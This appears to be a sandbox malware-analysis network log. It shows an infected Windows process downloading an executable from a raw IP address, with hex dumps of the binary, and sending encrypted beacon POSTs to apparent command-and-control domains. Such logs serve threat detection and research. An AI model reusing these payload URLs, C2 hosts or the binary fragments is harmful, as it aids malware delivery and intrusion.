                                                                                                                          Referer: http://xfevllovssfdblv.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 180
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:26:54.070061922 CEST180OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 49 d5 bd
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuQI|7ORgaFJF:Z;;I}2@Cm?HFU:R<zLo'!`
                                                                                                                          Oct 8, 2024 18:26:55.069500923 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:54 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.66141023.145.40.1644434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:23:54 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Host: 23.145.40.164
                                                                                                                          2024-10-08 16:23:54 UTC327INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:54 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Last-Modified: Tue, 08 Oct 2024 16:00:03 GMT
                                                                                                                          ETag: "38000-623f93af1dd20"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 229376
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                          2024-10-08 16:23:54 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 12 7a 9e 94 56 1b f0 c7 56 1b f0 c7 56 1b f0 c7 48 49 74 c7 4f 1b f0 c7 48 49 65 c7 46 1b f0 c7 48 49 73 c7 1b 1b f0 c7 71 dd 8b c7 55 1b f0 c7 56 1b f1 c7 38 1b f0 c7 48 49 7a c7 57 1b f0 c7 48 49 64 c7 57 1b f0 c7 48 49 61 c7 57 1b f0 c7 52 69 63 68 56 1b f0 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 12 dd 51 65 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zVVVHItOHIeFHIsqUV8HIzWHIdWHIaWRichVPELQe
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47 8b 45 14 85 c0 0f 8c 4b 01 00 00 83 f8 01 0f 84 42 01 00 00 83 f8 24 0f 8f 39 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 34 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 21 c7 45 14 10 00 00 00 eb 0a 83 f8 10 75 13 80 fb 30 75 0e 8a 07 3c 78 74 04 3c 58 75 04 47 8a 1f 47 8b b1 c8 00 00 00 b8 ff ff ff ff 33 d2 f7 75 14 0f b6 cb 0f b7 0c 4e f6 c1 04 74 08 0f be cb 83 e9 30 eb 1b f7 c1 03 01 00 00 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03 8b 7d 0c 83 65 fc 00 eb 5b 8b 5d fc 0f af 5d 14
                                                                                                                          Data Ascii: BtG-uM+uGEKB$9u*0tE4<xt<XtE!Eu0u<xt<XuGG3uNt0t1aw ;MsM9Er'u;v!M}u#EOu }t}e[]]
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 22 59 89 08 8b f1 eb b5 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 53 56 8b 75 08 33 db 57 39 5d 14 75 10 3b f3 75 10 39 5d 0c 75 12 33 c0 5f 5e 5b 5d c3 3b f3 74 07 8b 7d 0c 3b fb 77 1b e8 7f cd ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 03 e9 ff ff 83 c4 14 8b c6 eb d5 39 5d 14 75 04 88 1e eb ca 8b 55 10 3b d3 75 04 88 1e eb d1 83 7d 14 ff 8b c6 75 0f 8a 0a 88 08 40 42 3a cb 74 1e 4f 75 f3 eb 19 8a 0a 88 08 40 42 3a cb 74 08 4f 74 05 ff 4d 14 75 ee 39 5d 14 75 02 88 18 3b fb 75 8b 83 7d 14 ff 75 0f 8b 45 0c 6a 50 88 5c 06 ff 58 e9 78 ff ff ff 88 1e e8 05 cd ff ff 6a 22 59 89 08 8b f1 eb 82 cc cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03
                                                                                                                          Data Ascii: "Y3_^[]USVu3W9]u;u9]u3_^[];t};wj^0SSSSS9]uU;u}u@B:tOu@B:tOtMu9]u;u}uEjP\Xxj"YL$t$tNu$$~
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: dc 89 75 0c ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 75 1c ff 15 70 61 41 00 8b f8 3b f3 74 07 56 e8 9c d8 ff ff 59 8b c7 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 8f a6 ff ff c9 c3 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 11 c0 ff ff ff 75 24 8d 4d f0 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 16 fe ff ff 83 c4 1c 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 81 01 00 00 ff 76 04 e8 2c d8 ff ff ff 76 08 e8 24 d8 ff ff ff 76 0c e8 1c d8 ff ff ff 76 10 e8 14 d8 ff ff ff 76 14 e8 0c d8 ff ff ff 76 18 e8 04 d8 ff ff ff 36 e8 fd d7 ff ff ff 76 20 e8 f5 d7 ff ff ff 76 24 e8 ed d7 ff ff ff 76 28 e8 e5 d7 ff ff ff 76 2c e8 dd d7 ff ff ff 76 30 e8 d5 d7 ff ff ff 76 34 e8 cd d7 ff ff ff 76 1c e8 c5 d7 ff ff ff 76 38
                                                                                                                          Data Ascii: uuuuuupaA;tVYe_^[M3UuMu$Mu uuuuu}tMapUVuv,v$vvvv6v v$v(v,v0v4vv8
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 7f 3a e5 0e c9 3f b0 53 75 20 ce 8a bf 61 27 8d f0 18 5e 13 62 fc a8 66 86 89 c4 f9 d9 b2 39 9c 4c ba 01 f2 94 94 3d 97 9e b4 96 96 f7 30 13 df a8 53 de b0 7a 90 76 13 a7 ae 77 51 fc 66 ae a0 4a f8 0f 09 16 fb ed 21 fd 3c 7a d6 9c 32 ea f9 e4 e6 38 9d 3b 71 3b 39 34 db 45 3d 4d f9 99 81 4d 40 51 77 34 be 82 07 6b 40 ca 9b 13 37 4e 21 e4 81 05 91 cf 5d 07 b9 04 46 4b 48 56 98 56 4a d5 ed 00 d5 ca 00 15 40 2e 8f 3e d3 ea 5c 82 00 e8 9c 2d bc aa fd ab 04 47 d8 ef 77 dc b4 89 c7 46 fe 7d 12 0f 4e f0 4e d7 cc 96 9d 61 36 79 5d 97 3f 96 8f b3 fa 35 0d 96 5e 92 f1 43 0d 6f 64 47 ed 97 32 b5 49 90 50 71 33 02 84 f0 84 d0 39 1f 2a 95 a5 03 cb 67 c0 56 a8 f3 9f 12 76 ea 73 b2 64 45 25 ed 21 4d 65 72 f8 51 00 5c ff e4 b4 35 8f 60 e4 7f 99 0f 20 31 87 b9 87 27 72 09
                                                                                                                          Data Ascii: :?Su a'^bf9L=0SzvwQfJ!<z28;q;94E=MM@Qw4k@7N!]FKHVVJ@.>\-GwF}NNa6y]?5^CodG2IPq39*gVvsdE%!MerQ\5` 1'r
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 00 79 ab 6a 98 5c cb fa 40 5d 93 68 55 2b 0f a8 22 76 d8 bd 93 95 85 23 89 9f 94 20 ac 2d 95 77 6e c7 f2 ea c5 22 c5 30 f3 bb 72 43 f2 b4 c9 df 06 31 16 a4 d7 5f d6 37 9f 17 e2 c2 27 45 4f 98 c1 45 a3 f9 e1 d4 6e 95 e1 00 6a 6f 4d 77 28 0e a6 64 56 06 fd c6 d3 6a ff 9f bc f0 62 c0 f3 90 dd 37 dc 50 4d 6d cd a8 c8 e4 6a 27 2f 7f ac fc d9 b5 2b 9c 9e 02 20 51 3c c6 9a f9 91 98 c3 d3 91 7d ef 8b c9 47 f5 9a 13 dc de 91 70 39 44 0d 55 16 dc 11 26 0f 92 5e 61 11 c4 1f 00 9b fe 4e 05 a4 c6 3e 6d d4 f0 31 71 b0 3a b7 43 91 f1 be 7d 4f f3 ba b2 6f 78 7e 1e f3 e6 81 7b 85 e4 e3 11 32 8d 42 62 8a d8 19 3c 2b 6e 4e 86 19 42 c7 29 00 67 49 99 1d c3 56 d9 81 d4 8e 2f 66 81 a4 e4 92 38 d6 64 04 a5 69 4a b4 82 e6 7c 98 af a8 70 4b 17 f8 fe 09 c1 35 b1 de 66 3b 74 a2 1d
                                                                                                                          Data Ascii: yj\@]hU+"v# -wn"0rC1_7'EOEnjoMw(dVjb7PMmj'/+ Q<}Gp9DU&^aN>m1q:C}Oox~{2Bb<+nNB)gIV/f8diJ|pK5f;t
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 85 79 11 e1 d8 93 c1 61 e7 41 0a 3d 96 ac 48 97 21 9c f8 b3 92 c6 2b 5d e5 4a 46 95 1d 36 52 a2 47 9b bf d2 4d 73 01 20 f9 aa d5 b9 ab 5e 16 62 8e a7 d1 a7 b6 b6 5d 87 0d 55 c6 ad c9 dd c0 f2 92 27 3c 87 30 ce b3 96 dc d3 c3 f0 04 27 1e 17 1e 63 8c f5 be 45 fc 72 1d 0e 11 d3 f4 b5 f9 b9 cd 6c 07 02 35 1f 8c 92 35 82 47 69 f8 28 41 dd ae 0b 75 14 a5 71 7a 64 7c 61 68 c5 9e a6 76 42 37 5a f7 4a 3d ed d5 78 01 e9 a9 b3 77 6d 26 9f 97 39 1f 0a 75 62 0b 76 59 7a 2a 0a 66 36 b8 2e b0 1f 71 7e 59 41 c6 e8 a3 2f 39 96 c7 87 6e be e8 9c 46 ae 02 82 21 97 de ab 70 d1 d6 ee 2b 81 9e e2 b1 b6 ed d3 d1 08 77 92 aa 2d d8 17 e2 c7 4d 30 0f 27 9c 98 a8 c1 a5 da d6 99 fc 73 56 77 16 82 6a 80 4a e5 19 59 f1 71 c8 de fd 03 b6 3a e0 a1 a5 25 4e 50 10 af d6 1f fc f3 60 a7 ae
                                                                                                                          Data Ascii: yaA=H!+]JF6RGMs ^b]U'<0'cErl55Gi(Auqzd|ahvB7ZJ=xwm&9ubvYz*f6.q~YA/9nF!p+w-M0'sVwjJYq:%NP`
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 6f 2c 0f da bc 2c 78 e0 4a 56 d4 41 b4 b8 55 39 ba 31 4b a2 2f 24 21 1b 39 9e 15 d8 e1 3b 20 df 3e bb 14 87 2a d6 5c f1 e2 35 0d ab d6 a5 8f b9 4f 29 d1 9e 37 2d 6c 33 65 4b 0e 80 c8 ac 06 29 f6 4a 67 9b 77 9e 33 d5 d0 60 8c 67 64 c4 05 2c e4 a6 39 28 83 c4 e7 5a 70 3a 13 e1 d2 e2 c6 15 6a d4 1b 48 e7 4f 05 f3 38 e7 c1 6a 07 66 f8 7e 85 04 c3 ba b2 89 e9 d2 5c 24 1b e7 82 24 b1 11 3e dd ba 10 fb 05 83 95 13 7a 0c ff cf a1 39 81 fe ca d3 09 1e e5 4c 21 16 54 ad 44 a5 e4 24 88 9e e7 aa fc 95 18 c4 d8 dc f6 0c 81 65 50 39 37 42 e4 ee 46 1b 76 6d 4a e5 81 25 aa a7 f5 e6 66 62 30 59 0e cf a2 7d a4 26 54 8a 85 68 ff 59 00 fc 35 68 ea 4d d2 14 aa f1 00 47 51 37 21 7c 8b 14 6d 32 56 fb bd ed 3a 2f a5 58 e7 fe 7c 65 e6 f5 1c 8f f6 bf 4d 3e 8d 44 ed a7 8e 03 a1 58
                                                                                                                          Data Ascii: o,,xJVAU91K/$!9; >*\5O)7-l3eK)Jgw3`gd,9(Zp:jHO8jf~\$$>z9L!TD$eP97BFvmJ%fb0Y}&ThY5hMGQ7!|m2V:/X|eM>DX
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: cf 4a 46 76 aa b9 20 60 24 5a 11 1c 8d ec 5d b1 91 0b 20 08 54 35 cc 2d 6b 4e ba 5b 44 11 ad 64 a8 88 64 a4 26 95 00 22 53 09 b4 7e 63 28 d7 1b 9b dc 55 79 58 31 d5 41 1a 7a ed 97 d1 ec 37 3b 46 4e 04 85 7d 2c 8e 62 0d e0 0e dc 84 8c 39 f5 49 7f d5 a3 07 98 71 6d d0 82 cf a8 0c 96 13 aa 33 b1 d5 dc f3 f7 14 38 b7 ef 28 ba 34 5c 21 ac 7f 2d 59 df c3 12 6a 50 13 49 13 ae 5a 0f bb c7 5f 4c 33 6a 82 cc ef d5 ac bf 20 fa a3 ad 7f 77 18 da f2 5a d5 37 11 c5 f5 f6 fa 09 4d cf 65 95 2b 8c 15 01 cd ea d1 8d 4e 83 c3 a4 1f cd 98 96 25 28 47 0a 9d 1a 19 fa 29 49 bc 57 3e 0b 49 ad d5 97 e1 92 52 f9 6d 1f 9e 80 81 d0 6f ae 9f e2 c9 c7 58 72 dd ab a9 2a 8e 51 5e e6 42 5f 02 43 cc ae 44 2a 22 fa 84 62 08 1c 84 2b cf f5 b8 92 7d 64 15 19 18 94 0f 4a 1a c1 5f 19 a2 fe 6d
                                                                                                                          Data Ascii: JFv `$Z] T5-kN[Ddd&"S~c(UyX1Az7;FN},b9Iqm38(4\!-YjPIZ_L3j wZ7Me+N%(G)IW>IRmoXr*Q^B_CD*"b+}dJ_m
                                                                                                                          2024-10-08 16:23:54 UTC8000INData Raw: 19 36 35 8d cf 4f 29 66 8a 00 4a 86 8d fc 14 77 51 36 12 59 6b 7c 52 22 a7 c7 aa 2c a3 62 31 b2 18 a7 a6 bb 12 01 d7 d5 43 13 83 43 34 03 72 98 04 b9 3f 92 03 bf 52 3c 9a c6 93 d3 b0 1c 38 f1 67 1e 63 b1 fd 0f 6f 00 e4 97 65 94 26 0a 13 67 ed 54 17 32 01 f7 8c e2 ec f7 17 81 03 bb 88 e2 1f aa 37 fa 4d 35 14 b2 23 42 7a 24 ba dc 26 19 df f8 c4 37 1e 7d 5e c0 b4 8d aa a8 ca 2e 34 70 96 cd 66 be 05 ac 7f 54 3a 31 93 3a 23 14 c5 00 30 70 19 5a 51 0b 4d e7 7d 66 77 1f 90 d5 21 dc b8 2c 05 b8 4a 03 1b 2c 18 bb 14 11 b1 c2 44 ca a4 79 d5 97 7e 52 e3 05 c5 e7 d9 11 8b 46 5b 53 ee 3c 3f 81 6c 3a 8d 12 5b c2 de d5 e1 9f 17 71 5a 77 16 ff ec 1a 89 96 13 a4 34 9c 80 a1 8b f2 e7 07 76 69 c0 ed 9d 98 66 5d 45 bd e5 fa 31 f5 41 ca 5c 93 9e 7f bd f1 a8 35 85 62 f1 b6 32
                                                                                                                          Data Ascii: 65O)fJwQ6Yk|R",b1CC4r?R<8gcoe&gT27M5#Bz$&7}^.4pfT:1:#0pZQM}fw!,J,Dy~RF[S<?l:[qZw4vif]E1A\5b2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.66143323.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:20 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://vucrathrxdck.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 241
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:20 UTC241OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 6d ba 12 98 a4 fd 0a 22 a8 74 62 87 72 f6 e1 09 03 ce 04 2f 7f cb c7 d4 49 e9 d3 08 5d 92 93 5d 94 48 24 a0 e2 1a 1d 4f 56 0d 07 99 65 be 94 9c 48 de f4 73 14 52 8b 57 3a dd 4d 15 e1 9a f5 d2 26 07 b5 66 da 6a 88 7d 23 8c 1a a8 7b 30 4b 19 74 e8 cb 45 f3 99 77 e5 28 79 8a ca bb 51 da b9 07 b9 ad 8b 8f 32 55 87 be a6 57 18 b1 72 53 ea 08 17 29 9f 23 6a 7a bb 4c 2b 45 d4 8c ce 13 22 a3 e0 23 ef 4a 8b f7 e6 17 3d 7b 23 b8 07 76 55 1c 39 b8 4e f6 92 78 43 39 74 1d ef af 58 35 24 54 be a7
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLj4%<m"tbr/I]]H$OVeHsRW:M&fj}#{0KtEw(yQ2UWrS)#jzL+E"#J={#vU9NxC9tX5$T
                                                                                                                          2024-10-08 16:24:20 UTC294INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:20 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-10-08 16:24:20 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                                          Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                                          2024-10-08 16:24:20 UTC18INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                                          Data Ascii: JMQF 82
                                                                                                                          2024-10-08 16:24:20 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:
                                                                                                                          2024-10-08 16:24:20 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                                          Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                                          2024-10-08 16:24:20 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                                          Data Ascii: l
                                                                                                                          2024-10-08 16:24:20 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:
                                                                                                                          2024-10-08 16:24:20 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                                          Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                                          2024-10-08 16:24:20 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                                          Data Ascii: `O'
                                                                                                                          2024-10-08 16:24:20 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.66143423.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:21 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://krpqgyauqofjy.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 368
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:21 UTC368OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 76 b8 12 e8 a4 bf 56 5b dd 7d 62 a0 21 ff f9 39 2e df 1a 28 51 94 b1 f5 4f be ae 58 0e e5 87 3f bf 62 3a 93 c0 0f 1b 3b 1b 22 0d d9 69 ca e3 c6 4c 8a 99 43 37 52 a2 6e 59 db 41 0a e4 db e8 d4 26 0c 99 62 ac 6a ba 6c 3f c8 1f d2 2d 43 40 1d 70 e7 d9 63 fb aa 01 85 12 60 95 c9 c5 08 d5 8f 00 bd d3 92 97 51 38 c8 c4 df 08 4d b0 68 55 84 06 5b 49 a5 5b 13 46 e9 42 01 12 9f 8b 8c 14 47 b7 ea 73 80 4d 98 f0 b8 13 35 16 4e d9 40 69 5b 1c 07 a7 2f ee c3 6a 5f 12 59 5e e6 fe 64 2b 5e 26 b1 eb e6 58 88 ea 2c e4 37 df 87 a4 da 58 c2 77
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lj4%<vV[}b!9.(QOX?b:;"iLC7RnYA&bjl?-C@pc`Q8MhU[I[FBGsM5N@i[/j_Y^d+^&X,7Xw
                                                                                                                          2024-10-08 16:24:22 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:21 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.66143523.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:22 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://mjqditygumcpl.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 286
                                                                                                                          Host: ninjahallnews.com
